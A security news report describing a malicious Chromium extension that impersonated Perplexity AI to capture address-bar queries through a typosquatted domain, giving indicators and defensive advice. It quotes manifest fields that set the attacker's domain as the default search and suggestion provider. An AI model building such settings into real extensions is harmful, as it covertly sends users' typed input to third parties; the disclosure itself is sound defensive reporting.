Malicious Chromium Extension Impersonates Perplexity AI to Hijack Search Traffic
A malicious Chromium extension disguised as the AI search engine Perplexity AI has been discovered intercepting user search queries and redirecting traffic through attacker-controlled infrastructure.
Microsoft Threat Intelligence has identified a malicious Chromium-based browser extension that deceives users by impersonating the AI-powered answer engine Perplexity AI. The extension's primary objective appears to be the interception of search traffic and the collection of user data, which could subsequently be used for profiling, targeted advertising, or other malicious purposes. Following responsible disclosure, Microsoft reported the extension to Google, which has since removed it from its store.
Browser extensions remain a significant security risk due to their extensive access to browser APIs, user traffic, and browsing habits. This particular extension, built using Manifest V3, employs intermediary infrastructure and declarativeNetRequest (DNR) rules to discreetly capture Omnibox queries. Unlike traditional search hijackers that often rely on overt redirection, this malicious tool aims to maintain the appearance of legitimate search results while operating covertly.
The threat actor behind this extension is leveraging the growing popularity and perceived legitimacy of AI tools as a social engineering vector. By using branding similar to trusted AI services, they aim to increase installation rates and reduce user suspicion. The extension uses a typosquatted domain, perplexity-ai[.]online, which closely resembles the legitimate Perplexity AI domain (perplexity[.]ai), further increasing the potential for user confusion regarding its authenticity.
Analysis of the extension's manifest file reveals its intent to override default browser search settings. It declares itself as "Perplexity Search" and configures its search_provider to use the attacker-controlled domain for search queries. Crucially, the suggest_url field also routes through this malicious infrastructure, meaning every character typed into the address bar is transmitted to the attacker's servers before any search is performed or redirected.
While the observed behavior confirms the extension's capability to intercept user input and browsing signals, Microsoft's analysis has not yet found definitive evidence of additional objectives such as credential theft. However, the extensive permissions requested by the extension pose significant privacy and security risks to users.
To combat such threats, organizations are advised to enhance user awareness training programs, educating end-users about evolving social engineering tactics that capitalize on emerging trends like AI. A layered security strategy, correlating threat intelligence with behavioral signals, is also recommended.
The extension's manifest configuration includes settings like "search_provider": { "name": "Perplexity Search" } and "search_url": https://perplexity-ai[.]online/search/{searchTerms}. It also enforces itself as the default search provider using "is_default": true.
This incident underscores the ongoing trend of threat actors exploiting popular technologies and branding to facilitate their attacks. As AI continues to integrate into everyday tools, vigilance against extensions and applications that leverage AI-related branding for malicious purposes becomes increasingly critical.
This new report from The Hacker News details the specific Chrome extension ID, 'flkebkiofojicogddingbdmcmkpbplcd', and the look-alike domain, perplexity-ai[.]online, used by the malicious actor. It also highlights that the extension was configured to potentially redirect searches for Google and Bing, not just Perplexity, and included placeholders for future WebAssembly code execution, indicating a more advanced planned functionality.